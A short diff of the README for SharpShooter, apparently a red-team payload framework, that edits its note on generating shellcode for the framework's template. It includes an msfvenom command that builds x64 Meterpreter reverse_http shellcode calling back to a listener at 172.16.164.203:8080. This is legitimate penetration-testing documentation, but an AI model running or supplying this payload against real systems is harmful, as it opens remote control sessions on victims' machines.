mdsecactivebreach/SharpShooter/Readme.md

 SharpShooter contains a basic template for executing shellcode, here you can paste in a CSharp byte array of either your x86 or x64 shellcode.

-On 64-bit systems you must use x64 shellcode for JS/JSE, VBS/VBE and WSF payloads; you can generate it similar to the following:
+On 64-bit systems you must use x64 shellcode for JS/JSE, VBS/VBE and WSF payloads; you can generate it using msfvenom similar to the following:

 ```
 msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LHOST=172.16.164.203 LPORT=8080 EnableStageEncoding=True PrependMigrate=True -f csharp